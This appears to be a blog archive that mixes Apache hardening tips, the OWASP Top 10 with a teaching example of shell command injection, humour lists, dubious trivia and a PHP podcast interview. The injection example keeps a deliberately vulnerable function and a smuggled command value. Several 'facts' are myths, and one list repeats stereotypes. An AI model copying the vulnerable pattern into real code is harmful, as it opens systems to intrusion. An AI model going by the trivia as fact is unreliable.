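198.51.100.4 - - [10/Oct/2013:13:55:40 +0000] "GET /file/report.pdf HTTP/1.1" 200 81920 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2013:13:55:41 +0000] "GET /includes/images/apple.jpg HTTP/1.1" 200 4412 "-" "Mozilla/5.0"
EOF
)

# Combined-format fields as awk sees them: $1 client IP, $4 "[day:time",
# $6 the method with a leading quote, $7 the path, $9 the status code.

# trace_requests LOG: how many TRACE requests arrived at all
trace_requests() {
    printf '%s\n' "$1" | awk '$6 == "\"TRACE"' | wc -l | tr -d ' '
}

# trace_served LOG: TRACE requests answered 2xx, i.e. TraceEnable is still on
trace_served() {
    printf '%s\n' "$1" | awk '$6 == "\"TRACE" && $9 ~ /^2/' | wc -l | tr -d ' '
}

# forbidden_hits LOG: requests the rewrite allowlist turned into 403s
forbidden_hits() {
    printf '%s\n' "$1" | awk '$9 == "403"' | wc -l | tr -d ' '
}

# burst_ips LOG LIMIT: client IPs that requested the same page more than LIMIT
# times within one second, the condition behind DOSPageCount/DOSPageInterval
burst_ips() {
    printf '%s\n' "$1" | awk -v limit="$2" '
        { hits[$1 SUBSEP $4 SUBSEP $7]++ }
        END {
            for (k in hits) if (hits[k] > limit) { split(k, part, SUBSEP); flagged[part[1]] = 1 }
            for (ip in flagged) print ip
        }' | sort
}

echo "TRACE requests: $(trace_requests "$LOG") (served: $(trace_served "$LOG"))"
echo "403s from the allowlist: $(forbidden_hits "$LOG")"
echo "clients exceeding 2 hits per page per second: $(burst_ips "$LOG" 2)"
```

A non-zero trace_served after the TraceEnable change means the directive did not take effect (wrong file, or a virtual host overriding it); burst_ips with the same limit as DOSPageCount tells you which clients mod_evasive would have blocked, which is a cheap way to tune the threshold before enabling the module on production traffic.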
    

  8. Restrict File/Folder Access


    RewriteEngine on
    RewriteCond %{REQUEST_URI} !^/index\.php$
    RewriteCond %{REQUEST_URI} !^/file/(.+)
    RewriteCond %{REQUEST_URI} !^/includes/images/(apple|date)\.jpg$
    RewriteRule (.*) - [F]
    

    This code will only allow access to:

    • apple.jpg and date.jpg from your /includes/images/ folder,
    • your index.php file, and
    • any file from your /file/ directory.

    Otherwise it will forbid access to any other file and serve a 403 Forbidden error. Note that REQUEST_URI is the requested path without the query string, so /index.php?page=x is still allowed.

    With these rules in place you no longer need the following block in your .htaccess file:

    Order Deny,Allow
    Deny from All

    <files "index.php">
    Order Deny,Allow
    allow from all
    </files>
    

  9. Enable PHP basedir


    PHP has a built-in restriction that resembles a chroot, called open_basedir. With it, PHP scripts can open files only below the listed directories, so each site can be confined to its own directory, which is a very good idea from the security point of view. It is not a real chroot: it limits PHP's own file functions only and does not restrict what a process started through exec() or system() can read, so keep disable_functions (PHP item 1) in place as well.

    Add the following line to the website's virtual host configuration (php_admin_value, so that a .htaccess file inside the site cannot loosen it):

    php_admin_value open_basedir /var/www/foo.bar/:/usr/local/php/

    This specifies that PHP scripts in that site can access only the listed directories. Each entry is a prefix, so end it with a slash: /var/www/foo would also match /var/www/foobar.

  10. Update, Update, Update


    Just because it is Apache running on Linux doesn’t mean you shouldn’t bother to update. New holes and security risks are found all the time. You should always develop a sound update policy to keep on top of patches. If you have installed Apache with your distributions package manager, you can make the updates go seamlessly. If you have installed from source, make sure that upgrade is not going to break any modules or dependencies your Web site has. And if you update Apache, make sure PHP (if used) is updated as well.

Categories: Apache, Technology, Tips and Tricks, Unethical Hacking

Top 10 Application Security Risks (OWASP Top 10, 2013 edition)

A1 – Injection

Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.
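OS command injection, one of the interpreter cases A1 lists, in shell, with the hardened form beside it. This is an added example, not OWASP's or the original post's code: each function takes a host name as a web form might supply it, and the inputs in the checks are constructed.

```shell
#!/bin/sh
# Added example, not from OWASP or the original post: OS command injection in
# shell with the hardened form next to it. Inputs are constructed.
set -eu

# VULNERABLE (kept deliberately): the untrusted value is pasted into a command
# string that a second shell parses, so ';', '|' or '$(...)' in it become commands.
resolve_unsafe() {
    sh -c "printf 'resolving %s\n' $1"
}

# STEP 1 of the fix: pass the value as an argument, never as part of the string.
# The shell running the command no longer re-parses the data, so a payload is
# just an odd-looking host name (and the resolver would reject it).
resolve_as_argument() {
    sh -c 'printf "resolving %s\n" "$1"' _ "$1"
}

# STEP 2, defence in depth: positive validation against what a host name may
# contain, rejecting everything else before it reaches any interpreter.
resolve_safe() {
    case $1 in
        '' | *[!A-Za-z0-9.-]*)
            printf 'rejected: "%s" is not a host name\n' "$1" >&2
            return 1 ;;
    esac
    resolve_as_argument "$1"
}

echo "--- unsafe, payload runs:"
resolve_unsafe 'example.com; echo INJECTED'
echo "--- as argument, payload is inert:"
resolve_as_argument 'example.com; echo INJECTED'
echo "--- validated:"
resolve_safe example.com
```

The same shape applies to every interpreter in the A1 list: the fix is never to "escape better" inside a string the interpreter will parse, but to hand the data over through a channel the interpreter treats as data (an argument vector here, a bound parameter for SQL), with allowlist validation in front of it.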

A2 – Broken Authentication and Session Management

Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or exploit other implementation flaws to assume other users’ identities.

A3 – Cross-Site Scripting (XSS)

XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

A4 – Insecure Direct Object References

A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.

A5 – Security Misconfiguration

Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. All these settings should be defined, implemented, and maintained as many are not shipped with secure defaults. This includes keeping all software up to date.

A6 – Sensitive Data Exposure

Many web applications do not properly protect sensitive data, such as credit cards, tax ids, and authentication credentials. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud, or other crimes. Sensitive data deserves extra protection such as encryption at rest or in transit, as well as special precautions when exchanged with the browser.

A7 – Missing Function Level Access Control

Virtually all web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access unauthorized functionality.

A8 – Cross-Site Request Forgery (CSRF)

A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.

A9 – Using Components with Known Vulnerabilities

Vulnerable components, such as libraries, frameworks, and other software modules almost always run with full privilege. So, if exploited, they can cause serious data loss or server takeover. Applications using these vulnerable components may undermine their defenses and enable a range of possible attacks and impacts.

A10 – Unvalidated Redirects and Forwards

Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.

View Source:

Download PDF

Categories: Technology, Tips and Tricks, Unethical Hacking | Comments Off

99 Facts about Guys that Girls should know!

  1. Guys don’t actually look after good-looking girls. they prefer neat and presentable girls.
  2. Guys hate other flirts.
  3. A guy can like you for a minute, and then forget you afterwards.
  4. When a guy says he doesn’t understand you, it simply means you’re not thinking the way he is.
  5. “Are you doing something?” or “Have you eaten already?” are the first usual questions a guy asks on the phone just to get out from stammering.
  6. Guys may be flirting around all day but before they go to sleep, they always think about the girl they truly care about.
  7. When a guy really likes you, he’ll disregard all your bad characteristics.
  8. Guys go crazy over a girl’s smile.
  9. Guys will do anything just to get the girl’s attention.
  10. Guys hate it when you talk about your ex-boyfriend.
  11. When guys want to meet your parents, let them. …….don’t think so
  12. Guys want to tell you many things but they can’t. And they have one habit to gain courage and spirit to tell you many things and it is drinking! but do not generalize
  13. Guys cry!!!
  14. Don’t provoke the guy to heat up. Believe me. He will.
  15. Guys can never dream and hope too much.
  16. Guys usually try hard to get the girl who has dumped them, and this makes it harder for them to accept their defeat.
  17. When you touch a guy’s heart, there’s no turning back.
  18. Giving a guy a hanging message like “You know what?!..uh…never mind!” would make him jump to a conclusion that is far from what you are thinking.
  19. Guys go crazy when girls touch their hands……yeah right – whatever.
  20. Guys are good flatterers when courting but they usually stammer when they talk to a girl they really like.
  21. When a guy makes a prolonged “umm” or makes any excuses when you’re asking him to do you a favor, he’s actually saying that he doesn’t like you and he can’t lay down the card for you.
  22. When a girl says “no”, a guy hears it as “try again tomorrow”. So true.
  23. You have to tell a guy what you really want before he gets the message clearly.
  24. Guys hate gays!
  25. Guys love their moms.
  26. A guy would sacrifice his money for lunch just to get you a couple of roses.
  27. A guy often thinks about the girl who likes him. But this doesn’t mean that the guy likes her.
  28. You can never understand him unless you listen to him.
  29. If a guy tells you he loves you once in a lifetime. He does.
  30. Beware. Guys can make gossips scatter through half of the face of the earth faster than girls can.
  31. Like Eve, girls are guys’ weaknesses.
  32. Guys are very open about themselves.
  33. It’s good to test a guy first before you believe him. But don’t let him wait that long.
  34. No guy is bad when he is courting
  35. Guys hate it when their clothes get dirty. Even a small dot.
  36. Guys really admire girls that they like even if they’re not that much pretty.
  37. Your best friend, whom your boyfriend seeks help from about his problems with you may end up being admired by your boyfriend.
  38. If a guy tells you about his problems, he just needs someone to listen to him. You don’t need to give advice…….very true.
  39. A usual act that proves that the guy likes you is when he teases you.
  40. A guy finds ways to keep you off from linking with someone else.
  41. Guys love girls with brains more than girls in miniskirts. ……..sometimes…
  42. Guys try to find the stuffed toy a girl wants but would unluckily get the wrong one.
  43. Guys virtually brag about anything.
  44. Guys cannot keep secrets that girls tell them.
  45. Guys think too much.
  46. Guys’ fantasies are unlimited.
  47. Girls’ height doesn’t really matter to a guy but her weight does!……very true.
  48. Guys tend to get serious with their relationship and become too possessive. So watch out girls!!!
  49. When a girl makes the boy suffer during courtship, it would be hard for him to let go of that girl.
  50. It’s not easy for a guy to let go of his girlfriend after they broke up especially when they’ve been together for 3 years or more.
  51. You have to tell a guy what you really want before getting involved with that guy.
  52. A guy has to experience rejection, because if he’s too-good-never-been-busted, never been in love and hurt, he won’t be matured and grow up.
  53. When an unlikable circumstance comes, guys blame themselves a lot more than girls do. They could even hurt themselves physically.
  54. Guys have strong passion to change but have weak will power.
  55. Guys are tigers in their peer groups but become tamed P**** with their girlfriends….
  56. When a guy pretends to be calm, check if he’s sweating. You’ll probably see that he is nervous.
  57. When a guy says he is going crazy about the girl. He really is.
  58. When a guy asks you to leave him alone, he’s just actually saying, “Please come and listen to me”……sometimes .
  59. Guys don’t really have final decisions.
  60. When a guy loves you, bring out the best in him.
  61. If a guy starts to talk seriously, listen to him….very important.
  62. If a guy has been kept shut or silent, say something.
  63. Guys believe that there’s no such thing as love at first sight, but court the girls anyway and then realize at the end that he is wrong.
  64. Guys like femininity not feebleness.
  65. Guys don’t like girls who punch harder than they do.
  66. A guy may instantly know if the girl likes him but can never be sure unless the girl tells him.
  67. A guy would waste his time over video games and football, the way a girl would do over her romance novels and make-ups.
  68. Guys love girls who can cook or bake. ….they love u regardless.
  69. Guys like girls who are like their moms. No kidding!……true, but only when the guys are ready to settle down.
  70. A guy has more problems than you can see with your naked eyes.
  71. A guy’s friend knows everything about him. Use this to your advantage.
  72. Don’t be a snob. Guys may easily give up on the first sign of rejection.
  73. Don’t be biased. Try loving a guy without prejudice and you’ll be surprised.
  74. Girls who bathe in their eau de perfumes do more repelling than attracting guys.
  75. Guys are more talkative than girls are especially when the topic is about girls.
  76. Guys don’t comprehend the statement “Get lost” too well.
  77. Guys really think that girls are strange and have unpredictable decisions but still love them more.
  78. When a guy gives a crooked or pretentious grin at your jokes, he finds them offending and he just tried to be polite.
  79. Guys don’t care about how shiny their shoes are unlike girls.
  80. Guys tend to generalize about girls but once they get to know them, they’ll realize they’re wrong.
  81. Any guy can handle his problems all by his own. He’s just too stubborn to deal with it.
  82. Guys find it so objectionable when a girl swears.
  83. Guys’ weakest point is at the knee.
  84. When a problem arises, a guy usually keeps himself cool but is already thinking of a way out.
  85. When a guy is conscious of his looks, it shows he is not good at fixing things.
  86. When a guy looks at you, either he’s amazed by you or he’s criticizing you.
  87. When you catch him cheating on you and he asks for a second chance, give it to him. But when you catch him again and he asks for another chance, ignore him.
  88. If a guy lets you go, he really loves you.
  89. If you have a boyfriend, and your boy best friend always glances at you and it obviously shows that he is jealous whenever you’re with your boyfriend, all I can say is your boy best friend loves you more than your boyfriend does.
  90. Guys learn from experience not from the romance books that girls read and take as their basis of experience.
  91. You can tell if a guy is really hurt or in pain when he cries in front of you!
  92. If a guy suddenly asks you for a date, ask him first why.
  93. When a guy says he can’t sleep if he doesn’t hear your voice even just for one night, hang up. He also tells that to another girl. He only flatters you and sometimes makes fun of you.
  94. You can truly say that a guy has good intentions if you see him praying sometimes.
  95. Guys seek for advice not from a guy but from a girl.
  96. Girls are allowed to touch boys’ things. Not their hair!
  97. If a guy says you’re beautiful, that guy likes you.
  98. Guys hate girls who overreact. ……sometimes
  99. Guys love you more than you love them IF they are serious in your relationships.
Categories: Entertainment, Humour | Tags: , | Comments Off

True Friends

IF THE RESULT IS GOOD:
Mom – It is God’s grace.
Dad – Whose son is he, after all?
Friend – Come on, let’s go drink.

IF THE RESULT IS BAD:
Mom – To hell with this college.
Dad – All that pampering has spoiled him.
Friend – Come on, let’s go drink.

ON GETTING A JOB:
Mom – Take care of your health.
Dad – Work hard.
Friend – Come on, let’s go drink.

ON LOSING THE JOB:
Mom – The job was bad anyway.
Dad – Never mind, you will find another.
Friend – Come on, let’s go drink.

ON A BIRTHDAY:
Mom – May my son live long.
Dad – May you always get ahead.
Friend – Come on, let’s go drink.

ON GETTING MARRIED:
Mom – Always be happy.
Dad – Be happy.
Friend – Come on, let’s go drink.

ON HAVING A CHILD:
Mom – He/she takes after my son completely.
Dad – Be happy.
Friend – Come on, let’s go drink.

ON FAILING IN LOVE:
Mom – Son, forget her.
Dad – Be a man.
Friend – Come on, let’s go drink.

MORAL:
The world changes, but FRIENDS never do.

Categories: Entertainment, Humour | 629 Comments

21 Interesting Facts

1. Chewing gum while cutting onions can help stop a person from producing tears. Try it next time you chop these bulbs.

2. Until babies are six months old, they can breathe and swallow at the same time. Indeed convenient!

3. Offered a new pen to write with, 97% of all people will write their own name!

4. Male mosquitoes are vegetarians. Only females bite and savour blood.

5. The average person’s field of vision encompasses a 200-degree wide angle.

6. To find out if a watermelon is ripe, knock it, and if it sounds hollow then it is ripe.

7. Canadians can send letters with personalized postage stamps showing their own photos on each stamp.

8. Babies’ eyes do not produce tears until the baby is approximately six to eight weeks old.

9. It actually snowed in the Sahara Desert in February of 1979. Can you beat that!!

10. Plants watered with warm water grow larger and more quickly than plants watered with cold water.

11. Wearing headphones for just an hour will increase the bacteria in your ear by 700 times.

12. Grapes explode when you put them in the microwave.

13. Those stars and colours you see when you rub your eyes are called phosphenes.

14. Our eyes are always the same size from birth, but our nose and ears never stop growing.

15. Everyone’s tongue print is different, like fingerprints.

16. Contrary to popular belief, a swallowed chewing gum doesn’t stay in the gut. It will pass through the system and be excreted.

17. At 40 degrees centigrade a person loses about 14.4 calories per hour by breathing.

18. There is a hotel in Sweden built entirely out of ice; it is rebuilt every year.

19. Cats, camels and giraffes are the only animals in the world that walk right foot, right foot, left foot, left foot, rather than right foot, left foot.

20. Onions help reduce cholesterol if eaten after fatty meals.

21. The sound you hear when you crack your knuckles is actually the sound of nitrogen gas bubbles bursting.

Categories: Entertainment, General News, Humour | Tags: , , | 85 Comments

WCAG 2.0 Guidelines

  1. Perceivable: Information and user interface components must be presentable to users in ways they can perceive.
    The first principle is about how content is presented. It has four guidelines:

    1. Text Alternatives: Provide text alternatives for any non-text content so that it can be changed into other forms people need, such as large print, braille, speech, symbols or simpler language.
    2. Time-based Media: Provide alternatives for time-based media.
    3. Adaptable: Create content that can be presented in different ways (for example simpler layout) without losing information or structure.
    4. Distinguishable: Make it easier for users to see and hear content including separating foreground from background.
  2. Operable: User interface components and navigation must be operable.
    The second principle is about how content is operated. It has four guidelines:

    1. Keyboard Accessible: Make all functionality available from a keyboard.
    2. Enough Time: Provide users enough time to read and use content.
    3. Seizures: Do not design content in a way that is known to cause seizures.
    4. Navigable: Provide ways to help users navigate, find content, and determine where they are.
  3. Understandable: Information and the operation of the user interface must be understandable.
    The third principle is about how content is understood. It has three guidelines:

    1. Readable: Make text content readable and understandable.
    2. Predictable: Make Web pages appear and operate in predictable ways.
    3. Input Assistance: Help users avoid and correct mistakes.
  4. Robust: Content must be robust enough that it can be interpreted reliably by a wide variety of user agents, including assistive technologies.
    The fourth principle has a single guideline:

    1. Compatible: Maximize compatibility with current and future user agents, including assistive technologies.

Developing web content to meet the WCAG 2.0 guidelines makes it accessible to a wider audience.

Categories: Programming, Softwares, Tech News | Tags: , , | 68 Comments

The World Is More Dangerous Than I Thought!

Categories: Entertainment, Humour | 15 Comments

Hazards of Mobile Phones

Categories: Rochak Chauhan | 191 Comments

Why I Love my India !!!

  • A nation where the price of Rice is Rs.40/- per kg and Sim Card is free.
  • Pizza reaches home faster than an ambulance or police.
  • Car loan @ 5% but education loan @ 12%.
  • Students with 45% get admission in elite institutions through the quota system and those with 90% don’t because of merit.
  • Where a millionaire can buy a cricket team instead of donating the money to charity. 2 IPL teams are auctioned at Rs.3300 crores and India is still a poor country where people starve for 2 square meals a day.
  • A country where footwear that people wear is sold in AC showrooms, but vegetables, that they eat are sold on the footpath.
  • Where everybody wants to be famous but nobody wants to follow the path to be famous.
  • Assembly complex buildings are getting ready within a year while public transport bridges & roads alone take several years to be completed.
  • Where people make lemon juices with artificial flavors and dish wash liquids with real lemon.
Categories: Discussion, Entertainment, Humour | 522 Comments

Left brain vs Right brain

Left vs Right Brain

If clockwise, then you use more of the right side of your brain.
If anti-clockwise, then you use more of the left side of your brain.

It is possible to focus and change the direction of the dancer; see if you can do it.

LEFT BRAIN FUNCTIONS          RIGHT BRAIN FUNCTIONS
uses logic                    uses feeling
detail oriented               “big picture” oriented
facts rule                    imagination rules
words and language            symbols and images
present and past              present and future
math and science              philosophy and religion
can comprehend                can “get it” (i.e. meaning)
knowing                       believes
acknowledges                  appreciates
order/pattern perception      spatial perception
knows object name             knows object function
reality based                 fantasy based
forms strategies              presents possibilities
practical                     impetuous
safe                          risk taking

Categories: Entertainment, General News | 594 Comments

PHP Innovation Award of 2010 -Podcast episode 9 – PHP Classes blog

Contents

Introduction (0:20)

Interview with Rochak Chauhan – Innovation Award 2010 winner (0:38)

Is PHP losing popularity to Python and C#? (17:46)

PHP Programming Award nominees of December 2010 (34:22)

The good and the bad of the PHPClasses site according to Rochak Chauhan (42:37)

Conclusion (45:22)

Introduction (0:20)

Manuel Lemos: Hello, welcome to the Lately in PHP Podcast, this is episode number 9.  I’m Manuel Lemos the regular host, as usual I have here with me Ernani Joppert. Hello Ernani, how are you doing?
Ernani Joppert: Hello, Manuel, glad to be here, I’m doing great.

Interview with Rochak Chauhan – Innovation Award 2010 winner (0:38)

Manuel Lemos: And today we have a special episode because we are interviewing the Innovation Award winner of 2010, Rochak Chauhan. Hello Rochak, how are you doing?
Rochak Chauhan: I’m fine, it’s an honor to be here, thank you.
Manuel Lemos: I hope I have pronounced your name correctly.  I’m not sure how to spell your surname.
Rochak Chauhan: It’s Chauhan, Rochak Chauhan.
Manuel Lemos: Chauhan, I could never guess it.  OK, anyway just a brief introduction about why we are interviewing you. As I mentioned you were the 2010 winner of the PHP Programming Innovation Award.

This award is organized by the PHP Classes site since 2004, and since a few years ago the site started compiling annual rankings. Basically every month there are a few classes that are nominated and then the users vote and the winner of the votes gets some points. And adding all the points accumulated in each year we get to a winner, and this year, Rochak was the winner of the annual Innovation Award, so congratulations Rochak.

Rochak Chauhan: Thank you, thank you very much.

Manuel Lemos: As prize for this award, Rochak is getting a nice elePHPant. As you all know the elePHPant is the symbol of PHP, and he is getting an elePHPant plush toy. As I already commented, his prize is in the mail and he is going to get it in a few weeks.

ElePHPant PHP mascot

Well, I have to say that your participation in the site has been outstanding, not just in the last year. So for those that have not yet checked Rochak’s participation, so far he has submitted 44 packages, classes, that perform all sorts of functionality useful to PHP developers, and 12 of them were nominated to the Innovation Award throughout all these years in which Rochak has been participating.

And actually in the last year 6 packages that Rochak submitted were nominated. Throughout all these years Rochak has won the monthly awards 3 times. This is quite an impressive record. Rochak can you just comment a bit, not about all, but at least the last packages that you submitted that were nominated on this award, what they do?

Rochak Chauhan: Sure, sure.  First of all the pleasure is all mine.  What I do is, I get immense pleasure like I just want to share things with people.

Now about these classes, there was one of them was Twitter Auto-publish. If you remember Twitter changed their API. So using the user name and password you are not supposed to update your status now without authentication.  So I tried to find a way out using Open Source classes, Open Inviter, I used that class to login and then used the same method to update the status, so it worked.  So this was a small task one of my clients asked me to do and I wanted to share it with everybody.

Manuel Lemos: So a workaround, right?
Rochak Chauhan: It was a workaround.  It’s not illegal but we’re using the user name and password from the user and posting to the Twitter Web site without using the authentication, that’s all.
Manuel Lemos: Yeah, but is this something that Twitter approves or is this a less known API that you used?
Rochak Chauhan: Well, it’s another package called Open Inviter.  What it does, if you open the source code, it takes your user name and password, it’s a login to the website using that, so I use that, not to take any credit from them, I use the authentication, the login process from that. The only thing I added was a method to update the status because the main purpose of Open Inviter is to use the authentication and get the contacts.
Manuel Lemos: Right.  It seems it solved the problem of many people that all of a sudden had their Twitter based applications broken because they could not add OAuth support as easily.
Rochak Chauhan: Exactly.  And that takes huge coding for both sides because you have to create an application on Twitter and then use the same code on the website.  It was tedious so this one helped a lot and many of my clients thanked me personally, so that was a nice feeling.  That again that’s one of the things that keeps you motivated, right.
Manuel Lemos: Right, and what about the other nominated classes last year.
Rochak Chauhan: Another one was again similar, one was Facebook, again, similar thing I used on Facebook and then another one was PHP Duplicate Files Finder.  Now, again, this is a very common problem with every developer. We make updates, we save the backup and then after we have lots of duplicate files, that could be an image file or PHP. So I use basically an MD5 checksum to find the duplicate file names.
Manuel Lemos: Yeah, I remember actually we commented about it in a previous podcast, actually the month when it was announced as one of the winners.  And there were six, right, you commented on three or two so far?
Rochak Chauhan:  I have.  It was again what I basically did was if you rename the file, like say abc.php and I can save it as xyz.php but the content’s the same.  So it basically finds not the name but the content.
Manuel Lemos: That’s interesting, and what about the other classes?
Rochak Chauhan: Another one was PHP Search MySQL Tables. So there is something like you have grep in Linux. You can search files and file contents, but when there are many, automatically you need to find out from the tables the fields where exactly the is coming from, where exactly the label is coming from, so I use this class to do that, search from the text field, search from the label of all the databases.
Manuel Lemos: Yeah, it’s a sort of brute force solution to search the whole database, right?
Rochak Chauhan: Right, right, something like grep for MySQL.
Manuel Lemos: Yeah, I see.
Rochak Chauhan: And there was Text Spinner which was more like used for SEO, like you know if I write an article and it has 1,000 words, if I post it again it won’t count as a different article, so this basically Text Spinner changes synonymous with each other.
Manuel Lemos: Oh, I see, I remember we also commented on that.  Do you think Google would consider that legal because it sort of works around their methods to find duplicate content?
Rochak Chauhan: You can use it that way, like if I want to write multiple articles and I don’t want the changes something like I’m going there, I can say that he went there so he can change it, and I have online demos for that, it’s not always illegal, you can use it for legal purposes also.
Manuel Lemos: Well, when I said legal I didn’t mean in terms of law, I mean in the sense of Google determines how pages may rank or not either being duplicated or not.  OK, what about the other classes?
Rochak Chauhan: And this is again just to add Text Spinner can also be used for like multiple emails, if you send multiple emails you can change the subject and the content of the body without changing the actual meaning.

And then there was Compare Strings. Compare Strings is more like your Levenshtein function we have in PHP. It’s used to compare strings in how much they are related, Compare Strings, and so again it was most of the intent.  And then there was PHP MD5 decrypter, this was highly I could say illegal, it was getting from a Web site which now has a CAPTCHA, so this is not working at the moment now, but this is really just it uses the MD5 checksum…

Manuel Lemos: Yeah, to check existing dictionaries to…
Rochak Chauhan: Exactly.
Manuel Lemos: Yeah.  Maybe they use CAPTCHA because of your class, so many people are using it.

OK, this is quite an interesting collection of innovative classes, and I’m sure that many users of the site have appreciated them. And what I was going to ask you next regarding all these great contributions is what exactly motivates you to write so many innovative classes?

Rochak Chauhan: Number one is how I write it is basically when I face a problem like one of my developers face problems like this cannot be done, this gives me, cannot be done is like things I don’t like that to be said, so I have to find you can use some API or save some mashup but it obviously can be done.

So once I can place something I just want to share it with everybody, like you can say for testing also get the comments and best part to share, that’s what the whole purpose of Open Source is, so that’s what keeps me motivated.

Manuel Lemos: So we could say that your inspiration to contribute innovative classes is the challenges that you get from people telling you that it can’t be done or is also things like needs from your work?
Rochak Chauhan: It’s both, like once some clients come up with a specification this is very difficult like I’m not sure if it can be done, first of all I make it complex somehow using some API or mashup, and then it’s again you want it to be recognized also so I just use the PHP classes as a platform to share it with other developers and get their comments and feedback.
Manuel Lemos: So I imagine that all these classes that certainly were downloaded and used by many people get you great exposure, did you get better work opportunities, jobs, just because you published all these classes?
Rochak Chauhan: Of course, it is a very, very helpful thing, like many people are coming back to me like I used your class, it’s a nice class, now I want to implement it on my project or something, and they offer me as a job, so it’s again helping me as a professional services big boost.
Manuel Lemos: Yes, that’s what I imagine because it’s quite a lot of great classes that you developed, and you probably have many people asking you for further support on them.
Rochak Chauhan: Yes, of course.
Manuel Lemos: OK, and what would you say to motivate other PHP developers who participate in PHP Classes site to also get recognition and better opportunities like you have been getting?
Rochak Chauhan: I guess my first one would be like what I would do is get information like if they find out some new class, some new function or some method to do something, it’s better to contribute back to the society, back to the developer society and share it so that way they’re doing themselves a favor by getting the feedback, getting the recognition, and then you can always share and in return you also get some return, like I’ve also learned lots of new things from these PHP Classes.

It’s something like you have your online repository, you contribute to them and you get everything, the best part it’s all free.

Manuel Lemos: Right.  And well I can see that you somehow have been also inspired by others, by the work of others, and it’s great to see that with so many classes I hope that you are also inspiring others to also contribute with more great classes.

Ernani, I wonder if you have any other thing interesting to ask Rochak?

Ernani Joppert: Yes, I have two questions; one is if you have had any problems submitting packages that you have written for other tasks, if you have found that people that you work with are afraid of sharing their code and if you feel that this is a common difficulty.

And the other question is as you’ve had the opportunity to share the classes that you provided if you would be to inspire others that are listening here, what would be your final words to inspire people to contribute and at least get some exposure and get some other material from the sponsors and everything else?

Rochak Chauhan: Of course.  The answer to your first question is I don’t think I face any problem regarding that. If somebody is very reserved in sharing their code I would like to tell them it’s something like knowledge, you share knowledge it grows.

If I’m writing some code, I’m writing a class, I might be doing something wrong, maybe there might be some better way to do it, now if I share it with people you get feedback, people will tell you that I’ve got lots of things to learn like this, so the constructive feedback you get is the best thing for you to have done as a developer, as a knowledge, so you share and you learn more.

Ernani Joppert: Oh, yes.
Rochak Chauhan: The answer to your second question is again I would like to tell them if I can inspire that’s great, but I would like to tell every developer that whatever they learn share it with other people. It not only will give you confidence but it will give other people too, they’ll give you feedback and you learn in the long run.
Ernani Joppert: Very good, very good, thanks Rochak.
Rochak Chauhan: You’re welcome.
Manuel Lemos: Okay, well basically this interview is practically ended, I just wanted to ask you Rochak is there anything else you’d like to say regarding this award besides what I have asked you?
Rochak Chauhan: I guess I only have praise for this award. This is a very, very like innovative and advanced in a way because this not only gives you recognition but it gives you a way of PHP is getting now. It has lots of innovative things, what people don’t imagine that PHP can also do, like face recognition and we have these AI things going on and it’s amazing stuff. So it just shows the potential of PHP not only as a scripting but as an enterprise level solution and application, it’s really great.
Manuel Lemos: Right.  Well, we are glad that you are enjoying it and I hope you can continue contributing with more innovative packages.
Rochak Chauhan: I will do that, I will do that.  It’s my pleasure, I will do that.
Manuel Lemos: Well, thank you again for this interview.

Is PHP losing popularity to Python and C#? (17:46)

Now moving on to our next section of this podcast, I would like to bring up a topic, actually a comment, some comments that were posted in the latest TIOBE Ranking system.

For those not familiar with this system, it’s basically a way to evaluate, I mean sort of evaluate because I’m not sure about the accuracy of the conclusions that we can get, but this TIOBE ranking evaluates the popularity of languages.

And the latest rankings I would say for the last 6 months they sort of show that PHP popularity is dropping in favor of languages like Python and Ruby. Well, did you guys see those charts and the comments they produced there?

Rochak Chauhan: I did.  I did.  Let me just add on to that because I think this is you can say momentarily Python is rising due to the Django and other frameworks coming up, but that doesn’t mean PHP is losing any popularity.

Again, it’s in my opinion, because PHP has lots and lots of support like we have lots of framework CMS support and best support API’s, even like Google, Facebook, everybody is giving PHP code and API’s.

So I don’t think rising of Python we need to worry about, as a PHP developer I’m not even worried about this losing the popularity because PHP is I guess closing the gap between scripting and enterprise level solution for an application like ODesk and Facebook has proved that PHP can be used for an enterprise level application also.

So I think the rise of Python and C# momentarily, it’s just a moment, I’m not worried about that.

Manuel Lemos: Right, well, I think it would be important to understand this ranking, how it works. From what I could gather looking at their explanations of how they reached the numbers of popularity of languages, it seems that they go on the search engines and search for things like the name of the language and the programming.

For instance, if they want to evaluate the popularity of PHP they search for PHP programming, and then from the results they evaluate I think the first results and see the popularity of the sites that come up in the Alexa site, which is basically a site that shows statistics of traffic.

And I think it’s more complicated than this, I’m trying to simplify it just so you’ll have an idea, but the way I see it people searching for PHP programming does not mean that it’s every PHP developer.

So whatever these numbers show it seems to me if I interpret this right, the fact that the number of people searching for Python or Ruby or whatever is increasing does not mean that the number of people using other languages, PHP, or whatever, is decreasing. For instance if you already know PHP you won’t be searching for PHP programming. And it’s a bit odd.

And other than that you already mentioned that Python is probably becoming more popular because of a framework like Django and Ruby becoming more popular because, Ruby on Rails, but mainly Python I think there may be a different point of view to justify its popularity.

And that could be related to the fact that there are lots of developers that dream to work at Google. And since Google only works with a few languages like Python and Java, C++ and C, obviously many of them hope to learn Python to someday fulfill that dream of working at Google.

Obviously one thing may never lead to the other but at least they can hope, and that justifies the increase of popularity. And namely since the launch of the App Engine, for those that do not know, App Engine is the cloud computing solution provided by Google, and one of the project leaders is precisely Guido Van Rossum, who is the Python creator and I suppose lead developer, if there is such a role.

